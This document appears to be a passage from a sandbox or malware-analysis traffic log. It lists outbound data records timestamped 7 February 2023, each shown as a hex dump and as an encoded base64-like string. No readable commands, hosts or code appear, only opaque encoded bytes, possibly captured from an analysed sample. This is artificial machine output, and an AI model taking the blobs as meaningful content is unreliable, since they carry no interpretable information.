                                                                                                                                                                                                              Data Ascii: 5b8/FENkLMpGSK8eE0h+79DnsxkrFbP5mjzp+irRyR3oNFyy9+masvnuTQjA5FggJezUUkUpWh3B4ZXuG4/gsKopiNnhOXvNvvYN1D/pvHqVLHw8/cdzDkQGHaWYSnx7Ewpa0zE6RYeef4IWfIsC+Z9SrDeToF96eJpUE1aBwpldXRTwC7Ii4vSSjM1BR0O4MNwQQ/1yTIqZrYrPHl88decebksu07iTNwC0gXc4zWsrAznPnBNljf18e+vLUVQ
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5122OUTData Raw: 53 30 54 4d 41 66 6f 6a 69 52 4d 44 51 36 46 2b 4d 6e 71 61 38 48 4b 35 6d 5a 72 78 75 73 73 6d 6f 63 77 77 61 4f 43 58 6f 4b 39 69 6a 4c 46 74 59 50 4b 74 31 79 44 66 58 48 6c 42 67 61 6c 70 4b 56 73 69 73 49 6b 50 48 48 49 6b 68 4f 66 44 43 47 59 77 30 43 61 32 41 43 62 30 34 4a 63 41 68 64 6a 62 49 6e 71 4f 57 74 72 4f 67 67 79 53 66 74 4e 59 77 79 78 32 49 59 68 70 51 51 47 31 4e 2f 6d 65 75 39 78 33 33 76 6d 53 41 6c 45 45 4f 38 72 75 54 65 77 67 62 63 4d 45 63 56 46 73 53 68 4d 42 70 66 76 71 43 43 45 69 4e 4f 67 42 72 62 52 65 34 61 78 67 4f 68 69 2b 4b 69 4a 34 43 55 4d 2b 46 46 42 74 32 6b 47 79 37 41 6b 68 70 61 32 6b 6c 6e 4d 79 61 4d 31 70 2f 4a 6a 35 7a 74 50 78 71 75 31 6f 53 33 47 4b 4c 6c 73 4b 59 71 48 42 56 6a 6e 71 6f 55 4c 63 2b 4c 6f
                                                                                                                                                                                                              Data Ascii: S0TMAfojiRMDQ6F+Mnqa8HK5mZrxussmocwwaOCXoK9ijLFtYPKt1yDfXHlBgalpKVsisIkPHHIkhOfDCGYw0Ca2ACb04JcAhdjbInqOWtrOggySftNYwyx2IYhpQQG1N/meu9x33vmSAlEEO8ruTewgbcMEcVFsShMBpfvqCCEiNOgBrbRe4axgOhi+KiJ4CUM+FFBt2kGy7Akhpa2klnMyaM1p/Jj5ztPxqu1oS3GKLlsKYqHBVjnqoULc+Lo
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5138OUTData Raw: 43 39 53 30 67 48 47 62 48 65 30 55 38 6f 57 6d 43 65 67 61 37 63 7a 50 35 57 5a 4b 54 2f 54 59 43 57 63 72 73 53 2b 4b 47 4c 4c 30 57 56 77 52 46 42 52 44 46 31 6e 71 67 52 34 58 74 4d 48 70 30 6c 32 6b 79 71 78 7a 70 5a 6f 6f 54 53 33 62 4f 7a 5a 2b 70 4d 31 4b 30 2f 2f 59 50 6c 65 6f 49 77 5a 2b 52 34 34 4b 44 58 42 4e 64 36 44 70 76 52 63 67 69 30 56 79 54 33 35 53 6a 74 31 72 4c 30 74 61 45 50 69 76 68 56 66 6c 6d 42 37 73 78 52 67 50 48 51 54 56 4e 55 47 73 6b 4d 63 4c 67 43 42 47 45 36 2f 4a 6f 47 6e 72 76 69 63 51 34 57 75 79 56 46 35 2f 43 32 67 53 65 33 43 68 56 52 52 72 5a 33 55 74 4b 4d 34 6d 43 32 50 61 76 72 30 59 39 74 71 48 71 39 33 39 4f 62 42 41 63 70 2f 76 31 44 54 34 31 32 61 56 63 6d 38 74 69 56 4a 69 34 53 46 64 37 4f 34 65 54 7a 63
                                                                                                                                                                                                              Data Ascii: C9S0gHGbHe0U8oWmCega7czP5WZKT/TYCWcrsS+KGLL0WVwRFBRDF1nqgR4XtMHp0l2kyqxzpZooTS3bOzZ+pM1K0//YPleoIwZ+R44KDXBNd6DpvRcgi0VyT35Sjt1rL0taEPivhVflmB7sxRgPHQTVNUGskMcLgCBGE6/JoGnrvicQ4WuyVF5/C2gSe3ChVRRrZ3UtKM4mC2Pavr0Y9tqHq939ObBAcp/v1DT412aVcm8tiVJi4SFd7O4eTzc
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5154OUTData Raw: 6b 50 65 76 65 4e 59 63 52 33 6d 77 61 6e 4a 51 48 39 54 64 45 74 6c 52 69 7a 35 4b 48 6c 59 39 59 36 39 36 46 73 74 73 37 74 66 46 47 61 72 4f 68 36 53 2f 32 62 4c 77 52 76 6e 69 35 7a 42 5a 48 4f 57 43 59 4c 4d 66 6d 4a 4d 69 41 6c 6a 35 63 2b 2b 33 35 73 6b 6f 42 51 6d 66 68 51 2f 44 33 38 50 76 37 32 48 46 76 57 79 44 6c 77 7a 6d 4a 73 53 70 5a 76 78 62 61 4f 50 76 5a 42 51 57 2f 48 57 6e 33 42 69 69 36 2f 68 6b 75 6d 52 65 42 33 37 4d 32 59 72 62 43 78 68 44 31 52 5a 4f 56 77 52 47 44 6d 45 34 4c 6a 47 30 6f 35 43 52 67 52 31 77 70 66 57 73 6a 4a 41 6c 41 2f 2b 36 68 46 6b 31 64 44 36 6d 66 48 53 68 48 65 64 31 56 57 4f 78 55 52 33 31 46 6b 75 55 36 31 71 31 56 6e 72 49 2b 4b 36 61 78 5a 6f 70 6d 59 6e 76 66 74 71 6e 6e 48 75 58 41 43 76 6f 57 6b 33
                                                                                                                                                                                                              Data Ascii: kPeveNYcR3mwanJQH9TdEtlRiz5KHlY9Y696Fsts7tfFGarOh6S/2bLwRvni5zBZHOWCYLMfmJMiAlj5c++35skoBQmfhQ/D38Pv72HFvWyDlwzmJsSpZvxbaOPvZBQW/HWn3Bii6/hkumReB37M2YrbCxhD1RZOVwRGDmE4LjG0o5CRgR1wpfWsjJAlA/+6hFk1dD6mfHShHed1VWOxUR31FkuU61q1VnrI+K6axZopmYnvftqnnHuXACvoWk3
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5169OUTData Raw: 41 61 6e 36 4d 48 50 63 43 32 47 6e 77 4c 6c 49 33 2f 36 45 72 61 6f 31 77 4a 48 42 48 4b 71 63 70 59 44 6d 36 30 35 55 36 31 58 73 54 68 51 6b 79 68 4d 6f 76 50 70 6a 6a 65 30 62 58 50 34 6a 76 2b 45 68 73 2f 4b 62 4c 53 2b 65 53 44 7a 48 71 4e 76 69 44 75 69 6b 35 64 47 6c 69 31 55 31 6a 42 76 44 5a 34 6c 42 36 4c 31 32 34 79 68 6e 6c 78 6b 32 78 64 68 69 71 59 32 75 64 61 5a 54 71 51 38 44 78 77 67 30 65 43 72 6f 74 7a 69 48 48 2f 72 41 39 71 59 68 4e 6a 74 72 51 71 44 64 78 4d 68 57 47 64 73 42 48 4b 6f 56 58 76 57 45 42 67 50 6d 59 51 56 73 44 69 57 37 2f 34 76 35 47 58 61 65 33 42 74 78 52 62 35 51 35 62 6f 6c 74 42 31 38 4c 4e 48 6e 35 66 43 38 53 2b 70 62 5a 48 36 52 54 7a 41 42 50 62 4c 5a 58 4c 43 6c 6e 38 6c 4b 77 2b 58 75 4b 57 50 67 63 39 79
                                                                                                                                                                                                              Data Ascii: Aan6MHPcC2GnwLlI3/6Erao1wJHBHKqcpYDm605U61XsThQkyhMovPpjje0bXP4jv+Ehs/KbLS+eSDzHqNviDuik5dGli1U1jBvDZ4lB6L124yhnlxk2xdhiqY2udaZTqQ8Dxwg0eCrotziHH/rA9qYhNjtrQqDdxMhWGdsBHKoVXvWEBgPmYQVsDiW7/4v5GXae3BtxRb5Q5boltB18LNHn5fC8S+pbZH6RTzABPbLZXLCln8lKw+XuKWPgc9y
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5185OUTData Raw: 78 73 31 67 75 76 78 31 4d 32 30 79 6c 32 4b 2b 6d 62 77 47 4d 55 61 37 4c 6f 71 4c 68 34 68 39 39 2b 76 6b 65 4a 7a 4a 79 41 6f 73 64 46 65 2f 61 75 37 6b 79 6b 4c 53 77 51 42 51 6d 46 56 6d 2f 41 37 32 30 4a 37 66 33 6b 34 31 4d 56 73 76 37 52 74 50 67 48 4c 58 51 69 70 35 45 69 48 6b 50 39 78 49 77 43 34 54 70 6f 32 71 36 36 78 4d 55 76 6b 31 6c 2b 54 6c 4c 45 4d 70 7a 51 7a 5a 6d 34 78 2f 4b 4f 53 61 59 30 48 4d 33 34 31 56 68 76 6d 58 77 55 73 4a 76 35 32 5a 72 62 4e 66 45 4a 4a 72 4e 51 36 55 65 31 56 42 52 77 70 5a 79 51 49 32 65 78 56 30 4d 57 76 30 32 53 36 36 6b 41 75 68 69 33 70 71 33 2b 6a 58 4e 61 56 39 45 6d 55 68 36 7a 74 6e 6a 69 58 66 65 32 48 69 65 35 69 69 6c 70 4a 6a 57 43 66 41 79 74 42 6a 35 58 38 43 31 61 4e 30 77 75 46 61 4f 45 48
                                                                                                                                                                                                              Data Ascii: xs1guvx1M20yl2K+mbwGMUa7LoqLh4h99+vkeJzJyAosdFe/au7kykLSwQBQmFVm/A720J7f3k41MVsv7RtPgHLXQip5EiHkP9xIwC4Tpo2q66xMUvk1l+TlLEMpzQzZm4x/KOSaY0HM341VhvmXwUsJv52ZrbNfEJJrNQ6Ue1VBRwpZyQI2exV0MWv02S66kAuhi3pq3+jXNaV9EmUh6ztnjiXfe2Hie5iilpJjWCfAytBj5X8C1aN0wuFaOEH
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5201OUTData Raw: 47 74 4c 62 38 54 70 52 4e 44 37 42 66 75 37 78 51 4f 5a 68 57 38 73 39 4f 6e 59 79 32 48 75 4a 6d 2b 64 30 32 39 47 77 62 51 6b 6e 79 72 37 39 53 53 77 72 63 46 49 4c 76 2f 45 67 5a 38 38 63 42 56 4b 62 77 47 59 32 49 76 5a 6c 71 58 6d 34 48 46 79 48 63 31 54 32 45 37 4a 76 4c 55 63 44 36 63 51 2f 64 72 54 64 6e 6d 72 42 59 78 31 67 79 41 5a 54 39 62 63 42 30 6d 50 36 33 43 57 71 61 34 58 41 79 6f 4f 34 38 70 72 67 49 66 34 4c 34 50 46 43 6b 69 61 33 7a 47 6c 62 53 35 77 56 42 4c 4e 6d 32 58 50 70 61 75 59 53 67 52 5a 79 66 51 45 6a 43 42 36 56 7a 79 52 51 46 59 56 68 4d 4f 79 32 4a 73 6b 53 66 68 34 49 4e 37 2f 32 56 4f 57 6f 76 4e 33 2b 61 42 41 6b 75 65 66 70 6b 70 77 47 75 4a 2f 50 63 5a 4f 45 68 6f 7a 64 49 70 70 33 78 71 65 75 5a 39 77 42 74 76 6e
                                                                                                                                                                                                              Data Ascii: GtLb8TpRND7Bfu7xQOZhW8s9OnYy2HuJm+d029GwbQknyr79SSwrcFILv/EgZ88cBVKbwGY2IvZlqXm4HFyHc1T2E7JvLUcD6cQ/drTdnmrBYx1gyAZT9bcB0mP63CWqa4XAyoO48prgIf4L4PFCkia3zGlbS5wVBLNm2XPpauYSgRZyfQEjCB6VzyRQFYVhMOy2JskSfh4IN7/2VOWovN3+aBAkuefpkpwGuJ/PcZOEhozdIpp3xqeuZ9wBtvn
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5217OUTData Raw: 33 35 56 4d 57 51 4e 43 4a 44 35 68 6a 54 63 52 74 35 7a 45 48 73 63 76 4f 41 76 71 54 65 31 55 66 50 41 4f 76 74 74 36 6f 4c 6a 64 54 50 4f 30 42 41 62 72 58 67 71 75 51 6d 51 73 6c 79 57 38 66 38 68 2b 65 35 4b 61 4b 48 5a 4d 48 6c 67 37 6e 55 33 66 32 76 45 41 58 34 35 78 61 5a 4a 57 54 4c 78 75 42 39 37 4d 30 36 4d 4f 4d 39 56 54 61 30 54 37 52 39 42 77 32 59 75 6b 47 42 6d 6e 4e 58 32 56 54 4f 6f 33 53 4f 5a 70 78 4a 55 6a 6c 58 62 56 64 41 6b 73 52 6d 46 41 57 58 4c 35 71 57 52 5a 6e 45 6a 47 72 5a 6b 56 61 6f 72 30 76 45 36 41 4b 38 2b 54 73 46 30 6b 4d 36 53 74 6b 58 56 6f 41 36 75 4b 31 49 37 48 63 41 45 42 38 73 45 4f 57 75 4e 41 64 2f 59 35 6a 74 50 57 4b 33 44 46 5a 7a 46 34 72 38 77 4b 50 47 4b 67 35 63 6d 41 67 4e 75 4f 34 4c 75 6d 73 73 42
                                                                                                                                                                                                              Data Ascii: 35VMWQNCJD5hjTcRt5zEHscvOAvqTe1UfPAOvtt6oLjdTPO0BAbrXgquQmQslyW8f8h+e5KaKHZMHlg7nU3f2vEAX45xaZJWTLxuB97M06MOM9VTa0T7R9Bw2YukGBmnNX2VTOo3SOZpxJUjlXbVdAksRmFAWXL5qWRZnEjGrZkVaor0vE6AK8+TsF0kM6StkXVoA6uK1I7HcAEB8sEOWuNAd/Y5jtPWK3DFZzF4r8wKPGKg5cmAgNuO4LumssB
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5233OUTData Raw: 79 78 33 30 33 6b 66 68 6a 41 76 50 74 49 52 66 74 63 39 68 6e 76 6b 44 6d 64 69 52 4a 70 7a 31 47 2f 4a 4d 36 56 41 5a 65 6e 35 4c 41 56 5a 59 5a 77 70 50 57 6a 4b 4d 47 63 35 62 48 64 31 63 6c 6c 49 66 78 63 39 57 33 76 48 4d 4a 56 34 64 4d 6b 37 35 65 42 7a 62 39 58 61 6e 6e 75 43 4a 6c 7a 71 52 6c 52 71 67 49 7a 32 35 2f 6a 6f 6b 70 35 50 68 50 36 77 33 6d 46 76 54 69 43 72 45 78 72 57 53 30 78 2b 68 49 44 6e 70 36 56 43 77 43 61 4a 53 47 55 78 4a 59 45 31 74 30 68 44 70 49 4a 59 42 68 6b 5a 6a 32 64 48 6f 46 4a 2f 73 2f 74 68 6c 5a 56 77 48 51 49 57 48 45 41 4e 51 5a 38 4f 75 46 79 38 75 52 32 4b 65 71 6a 64 34 53 6e 61 7a 4c 72 43 56 6c 70 58 50 69 4d 49 41 48 4b 32 65 69 48 33 7a 78 6a 33 4c 4b 46 37 6b 54 69 6c 30 79 47 48 6c 6d 77 62 63 6d 4a 35
                                                                                                                                                                                                              Data Ascii: yx303kfhjAvPtIRftc9hnvkDmdiRJpz1G/JM6VAZen5LAVZYZwpPWjKMGc5bHd1cllIfxc9W3vHMJV4dMk75eBzb9XannuCJlzqRlRqgIz25/jokp5PhP6w3mFvTiCrExrWS0x+hIDnp6VCwCaJSGUxJYE1t0hDpIJYBhkZj2dHoFJ/s/thlZVwHQIWHEANQZ8OuFy8uR2Keqjd4SnazLrCVlpXPiMIAHK2eiH3zxj3LKF7kTil0yGHlmwbcmJ5
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5249OUTData Raw: 73 73 4e 33 57 79 62 67 6c 76 79 71 54 51 52 76 55 2b 47 2b 79 47 35 38 68 33 35 4e 32 38 4c 56 30 5a 6d 53 77 37 6b 75 79 57 51 6e 32 54 41 6d 42 47 65 39 33 48 44 57 37 48 57 44 41 35 2b 78 4e 62 64 47 66 70 2b 6c 66 61 42 70 43 6b 6a 58 70 4d 49 43 52 64 6d 42 6f 41 4c 7a 6f 79 4a 39 6b 63 69 30 4a 6c 4a 66 67 6d 34 75 72 6b 36 37 32 6b 79 71 52 77 67 43 55 68 4a 49 35 67 30 45 2b 53 79 6c 74 6e 30 4f 5a 4f 39 2f 46 62 56 71 6a 47 31 4a 69 57 64 38 58 6c 6c 53 4b 68 45 4a 78 45 72 53 49 36 66 41 54 77 67 58 50 63 31 6d 6b 4e 45 2f 71 59 66 67 45 76 58 6c 78 6e 57 58 45 69 47 70 45 56 39 4f 75 6d 50 66 76 4b 55 73 2f 58 47 33 71 4c 41 74 6a 4b 4b 70 4f 33 33 2f 4e 54 52 65 57 52 77 6d 65 66 42 36 53 33 78 39 74 34 44 59 6f 67 36 61 2b 36 74 55 42 56 4a
                                                                                                                                                                                                              Data Ascii: ssN3WybglvyqTQRvU+G+yG58h35N28LV0ZmSw7kuyWQn2TAmBGe93HDW7HWDA5+xNbdGfp+lfaBpCkjXpMICRdmBoALzoyJ9kci0JlJfgm4urk672kyqRwgCUhJI5g0E+Syltn0OZO9/FbVqjG1JiWd8XllSKhEJxErSI6fATwgXPc1mkNE/qYfgEvXlxnWXEiGpEV9OumPfvKUs/XG3qLAtjKKpO33/NTReWRwmefB6S3x9t4DYog6a+6tUBVJ
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5265OUTData Raw: 50 6c 6c 43 4f 76 4c 30 72 61 76 67 49 2f 46 39 50 62 71 6c 47 47 71 4b 65 74 2f 55 30 68 2b 34 62 61 52 4e 47 39 38 6a 45 79 45 6e 4c 75 74 56 6c 4d 76 68 65 4d 6a 41 38 51 7a 44 6a 62 44 4c 79 56 6c 6d 35 6d 37 32 68 6c 4a 73 46 76 59 43 4a 35 50 38 4a 49 6f 42 6c 6a 41 55 7a 64 36 45 31 73 51 79 6f 4a 4c 69 63 52 46 68 4b 41 33 45 77 4e 6b 6d 70 46 53 50 4e 6a 34 6b 6b 70 42 43 4a 35 2b 61 57 56 2f 69 71 68 51 71 4d 70 59 77 38 50 46 6f 35 62 66 6e 66 75 30 68 41 54 6c 63 38 57 70 4b 52 45 50 59 73 46 43 48 58 2b 46 39 37 69 43 38 31 53 49 57 55 4b 39 36 56 42 32 6d 7a 4d 36 79 50 6e 35 49 62 73 31 69 45 50 71 2f 7a 6a 43 56 64 72 64 7a 79 6c 2f 45 35 4b 35 42 35 4b 43 54 61 4f 51 75 56 62 74 45 44 31 66 7a 41 50 53 6f 2b 57 63 35 65 56 2f 71 58 43 58
                                                                                                                                                                                                              Data Ascii: PllCOvL0ravgI/F9PbqlGGqKet/U0h+4baRNG98jEyEnLutVlMvheMjA8QzDjbDLyVlm5m72hlJsFvYCJ5P8JIoBljAUzd6E1sQyoJLicRFhKA3EwNkmpFSPNj4kkpBCJ5+aWV/iqhQqMpYw8PFo5bfnfu0hATlc8WpKREPYsFCHX+F97iC81SIWUK96VB2mzM6yPn5Ibs1iEPq/zjCVdrdzyl/E5K5B5KCTaOQuVbtED1fzAPSo+Wc5eV/qXCX
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5281OUTData Raw: 66 70 6d 49 4e 52 7a 34 62 7a 32 69 2f 65 75 72 4e 66 44 66 65 6b 78 58 6b 53 78 73 48 6d 72 35 6a 61 2f 33 43 47 68 70 71 49 64 74 46 50 4c 73 34 33 79 36 33 66 74 70 56 64 4d 4e 73 6e 65 45 47 46 58 4e 77 62 79 4d 7a 5a 45 74 78 66 54 44 51 50 46 74 57 55 54 30 72 43 38 31 4e 4f 6c 45 38 69 64 62 4e 6e 72 61 79 39 56 43 52 77 2b 78 61 31 44 63 4d 57 34 36 32 32 50 6d 6f 47 6d 6c 78 2f 44 55 33 72 44 7a 75 53 42 72 38 62 47 79 65 6b 73 64 6b 77 71 4f 63 55 62 34 2f 57 62 54 59 70 36 55 67 30 58 71 45 36 61 37 49 38 55 36 43 42 49 52 68 76 6e 78 33 53 63 74 53 50 6f 68 75 77 4a 76 70 68 55 59 66 76 50 46 55 6d 50 65 6b 74 2b 47 57 74 65 72 68 62 48 47 57 77 38 57 77 7a 5a 49 2f 6a 4e 36 33 54 6e 31 63 4b 54 32 63 65 50 74 39 58 73 4a 6e 44 6c 4a 41 75 66
                                                                                                                                                                                                              Data Ascii: fpmINRz4bz2i/eurNfDfekxXkSxsHmr5ja/3CGhpqIdtFPLs43y63ftpVdMNsneEGFXNwbyMzZEtxfTDQPFtWUT0rC81NOlE8idbNnray9VCRw+xa1DcMW4622PmoGmlx/DU3rDzuSBr8bGyeksdkwqOcUb4/WbTYp6Ug0XqE6a7I8U6CBIRhvnx3SctSPohuwJvphUYfvPFUmPekt+GWterhbHGWw8WwzZI/jN63Tn1cKT2cePt9XsJnDlJAuf
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5297OUTData Raw: 78 69 66 58 34 70 71 77 35 39 2b 7a 49 62 6c 46 55 73 51 74 70 68 2b 56 32 42 6a 31 49 6f 41 2f 55 66 6d 74 35 4b 73 77 61 61 77 66 33 51 49 32 68 4e 6b 34 2b 45 43 75 50 47 4f 30 43 41 65 43 39 36 4c 56 49 74 72 47 4d 66 34 42 43 2f 4e 31 41 6f 62 77 65 74 77 47 34 37 70 79 6d 31 79 55 41 4c 71 54 43 50 4e 52 41 68 45 5a 51 2f 6d 58 4d 37 4f 58 74 6c 66 68 74 6f 76 77 4b 39 75 42 78 46 63 76 42 53 78 79 4c 6a 2f 66 72 76 46 34 45 36 6a 48 65 6c 79 55 63 52 56 57 6e 4a 4e 73 58 70 43 67 31 37 42 6f 6b 39 30 36 31 5a 36 68 37 38 35 6e 4d 51 34 55 58 68 50 54 47 6e 4c 77 74 36 36 63 30 77 76 32 66 62 6e 7a 57 33 74 47 4d 70 6a 61 39 59 72 2f 57 2f 71 72 54 32 54 65 63 35 55 6d 70 71 4c 52 73 74 36 63 4b 65 6f 62 6a 73 74 68 53 78 6e 39 6b 32 59 45 44 6d 4d
                                                                                                                                                                                                              Data Ascii: xifX4pqw59+zIblFUsQtph+V2Bj1IoA/Ufmt5Kswaawf3QI2hNk4+ECuPGO0CAeC96LVItrGMf4BC/N1AobwetwG47pym1yUALqTCPNRAhEZQ/mXM7OXtlfhtovwK9uBxFcvBSxyLj/frvF4E6jHelyUcRVWnJNsXpCg17Bok9061Z6h785nMQ4UXhPTGnLwt66c0wv2fbnzW3tGMpja9Yr/W/qrT2Tec5UmpqLRst6cKeobjsthSxn9k2YEDmM
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5313OUTData Raw: 4e 6c 57 44 55 33 37 56 38 39 62 31 43 41 71 74 5a 44 4f 46 77 4f 70 74 43 4d 6f 6b 53 38 62 74 65 72 77 72 6b 55 37 55 42 78 6e 77 39 33 79 68 2f 38 42 42 54 6f 78 6e 62 35 71 4f 44 6f 78 38 70 2f 6a 73 6f 45 46 58 6e 64 34 41 75 2b 68 34 58 68 73 43 67 6d 2f 55 76 63 6f 39 39 48 56 6b 57 4d 76 6b 41 2b 37 33 6e 2b 49 76 41 46 70 49 70 47 50 32 38 53 38 2b 34 64 6c 4a 32 77 59 6f 72 6d 49 56 48 77 70 59 77 6b 49 79 70 32 76 32 45 52 74 49 6f 75 71 56 63 63 4d 4f 70 6f 6a 6c 61 50 37 5a 6a 68 6d 4f 58 32 78 49 66 65 2b 49 6f 34 55 78 64 68 30 65 2b 49 73 71 37 4e 36 6a 4a 2f 43 7a 6c 59 6c 33 51 62 31 77 56 57 59 31 38 63 4f 69 33 71 52 51 55 32 59 44 45 51 65 73 6b 67 33 61 6f 41 38 4a 4e 6d 42 31 70 64 55 48 7a 48 61 33 75 53 2f 50 4c 43 78 47 31 6b 41
                                                                                                                                                                                                              Data Ascii: NlWDU37V89b1CAqtZDOFwOptCMokS8bterwrkU7UBxnw93yh/8BBToxnb5qODox8p/jsoEFXnd4Au+h4XhsCgm/Uvco99HVkWMvkA+73n+IvAFpIpGP28S8+4dlJ2wYormIVHwpYwkIyp2v2ERtIouqVccMOpojlaP7ZjhmOX2xIfe+Io4Uxdh0e+Isq7N6jJ/CzlYl3Qb1wVWY18cOi3qRQU2YDEQeskg3aoA8JNmB1pdUHzHa3uS/PLCxG1kA
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5329OUTData Raw: 42 4c 6b 70 50 4f 76 43 64 4f 35 65 4f 4b 5a 5a 30 46 67 47 69 4e 6b 66 39 79 70 37 4d 6d 63 55 46 6e 50 64 56 43 59 58 77 4c 53 34 70 78 6f 51 46 57 42 5a 30 2b 32 52 56 52 37 41 76 32 44 6b 5a 4a 4a 42 75 33 47 2b 78 63 6c 66 47 37 50 77 53 38 4a 72 42 42 78 48 4b 54 6c 36 63 77 52 37 6f 44 46 39 5a 6b 52 55 54 61 36 59 68 6f 66 63 2b 64 72 36 68 46 6d 5a 67 6e 63 4c 47 77 4a 79 43 66 33 4e 32 67 47 6d 44 6a 76 46 47 4c 50 63 33 59 75 6f 4e 51 42 7a 31 2f 65 65 38 69 4f 64 44 35 59 53 68 30 59 6d 74 41 6c 76 31 66 4b 69 77 2b 30 72 39 74 78 68 45 64 6b 33 49 2f 6c 2f 6b 35 2f 66 62 4d 51 59 34 61 74 37 31 59 36 64 48 74 6c 63 77 69 4e 4d 52 57 6a 58 43 47 66 61 33 64 36 5a 6b 6a 58 35 50 50 42 50 69 53 6a 35 71 75 4f 34 62 76 72 32 64 6e 31 58 6a 47 35
                                                                                                                                                                                                              Data Ascii: BLkpPOvCdO5eOKZZ0FgGiNkf9yp7MmcUFnPdVCYXwLS4pxoQFWBZ0+2RVR7Av2DkZJJBu3G+xclfG7PwS8JrBBxHKTl6cwR7oDF9ZkRUTa6Yhofc+dr6hFmZgncLGwJyCf3N2gGmDjvFGLPc3YuoNQBz1/ee8iOdD5YSh0YmtAlv1fKiw+0r9txhEdk3I/l/k5/fbMQY4at71Y6dHtlcwiNMRWjXCGfa3d6ZkjX5PPBPiSj5quO4bvr2dn1XjG5
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5345OUTData Raw: 4c 56 4c 2f 74 37 48 64 76 63 51 6c 4d 76 39 74 52 42 67 71 68 52 67 68 4f 44 70 4f 63 6b 67 61 6a 58 6f 34 47 6d 64 44 71 46 57 6f 6d 6c 59 6d 52 45 2b 34 4b 4a 74 62 4c 39 53 35 4a 64 2b 4e 73 73 61 4e 57 37 39 65 6b 54 57 50 64 46 62 38 53 30 4e 79 51 6c 2f 63 6e 33 69 31 35 72 36 6a 33 63 2f 6a 56 4f 52 4b 31 58 32 31 76 70 44 74 77 34 48 5a 64 46 38 35 30 2b 76 70 35 76 41 52 65 32 79 76 43 46 6f 54 30 30 47 44 34 66 4d 57 6e 61 56 54 44 33 51 73 77 62 57 55 36 56 39 36 33 4a 46 49 34 6d 78 71 6d 2f 34 63 51 39 31 4d 49 30 44 43 31 56 4e 31 74 31 72 5a 72 36 61 43 48 39 36 30 49 42 41 79 33 6a 6a 6c 6c 34 68 70 33 35 54 4d 71 4f 78 32 47 4f 78 33 71 62 74 6d 41 48 72 66 47 4b 6d 5a 42 31 44 63 73 78 6c 65 30 51 4f 61 6c 62 66 33 30 61 6c 67 34 7a 48
                                                                                                                                                                                                              Data Ascii: LVL/t7HdvcQlMv9tRBgqhRghODpOckgajXo4GmdDqFWomlYmRE+4KJtbL9S5Jd+NssaNW79ekTWPdFb8S0NyQl/cn3i15r6j3c/jVORK1X21vpDtw4HZdF850+vp5vARe2yvCFoT00GD4fMWnaVTD3QswbWU6V963JFI4mxqm/4cQ91MI0DC1VN1t1rZr6aCH960IBAy3jjll4hp35TMqOx2GOx3qbtmAHrfGKmZB1Dcsxle0QOalbf30alg4zH
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5361OUTData Raw: 6e 61 6f 4e 74 56 68 75 34 68 65 30 32 54 57 68 74 49 50 41 6b 48 6b 43 6b 31 78 6a 72 72 73 4d 6a 48 4b 45 58 52 43 47 4e 51 59 4c 4d 5a 36 68 55 53 55 73 42 46 4e 4f 6b 73 6b 65 47 5a 39 4e 4d 66 2b 65 32 67 46 56 4f 34 79 4e 4b 6d 4d 58 72 4e 6c 57 34 76 36 52 4b 58 6f 46 77 6a 47 75 47 51 54 42 71 72 62 78 61 78 37 50 54 31 44 67 2f 41 65 4e 78 51 52 6f 35 6f 55 67 63 54 34 52 70 33 64 75 67 2f 69 62 55 79 50 48 34 32 51 6b 62 34 41 45 42 65 69 58 42 70 4d 64 66 6b 4f 59 42 49 78 72 41 5a 7a 38 74 33 53 39 4d 6d 2b 4b 6c 62 34 6b 62 35 66 6f 70 6a 4a 4e 6e 61 76 44 54 4b 67 6d 59 67 64 58 4e 50 77 44 70 33 39 36 6f 79 32 5a 7a 7a 6c 77 39 42 73 50 2f 69 54 79 39 41 67 6d 74 33 70 4e 65 53 48 4c 39 4a 6c 64 47 73 76 4c 49 4c 34 57 48 64 54 46 4b 54 32
                                                                                                                                                                                                              Data Ascii: naoNtVhu4he02TWhtIPAkHkCk1xjrrsMjHKEXRCGNQYLMZ6hUSUsBFNOkskeGZ9NMf+e2gFVO4yNKmMXrNlW4v6RKXoFwjGuGQTBqrbxax7PT1Dg/AeNxQRo5oUgcT4Rp3dug/ibUyPH42Qkb4AEBeiXBpMdfkOYBIxrAZz8t3S9Mm+Klb4kb5fopjJNnavDTKgmYgdXNPwDp396oy2Zzzlw9BsP/iTy9Agmt3pNeSHL9JldGsvLIL4WHdTFKT2
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC5377OUTData Raw: 7a 6a 64 77 6c 71 54 2b 4a 4d 51 75 56 4c 76 41 7a 32 47 54 4f 43 54 77 2b 48 74 51 61 66 69 79 31 37 6a 66 39 56 52 6c 30 50 61 57 46 66 72 56 78 57 6e 4e 4c 61 38 46 36 33 77 6d 54 6c 45 48 6c 68 37 78 75 56 62 75 67 55 44 46 5a 48 59 45 73 39 4a 6e 77 49 77 6e 49 49 42 70 46 6a 42 33 47 6e 2b 6d 34 46 71 43 78 76 56 78 4a 54 75 36 71 64 34 75 4f 51 33 79 6c 38 6b 31 70 66 30 4d 46 2b 41 56 74 51 43 5a 2b 73 6a 77 39 32 72 38 5a 32 6e 34 7a 75 57 46 41 42 35 66 68 6a 49 43 62 37 66 2b 42 34 49 4c 58 6a 54 36 59 48 66 57 42 33 46 55 4a 64 6c 6e 30 6e 62 75 33 68 4a 32 47 77 45 33 7a 67 63 75 35 54 68 77 30 67 4d 42 52 6d 62 7a 38 33 4b 58 48 7a 78 71 64 6a 4e 48 48 72 55 46 55 36 4b 58 42 6a 36 7a 54 6e 73 30 41 31 2b 44 47 53 6e 43 30 69 58 65 62 43 35
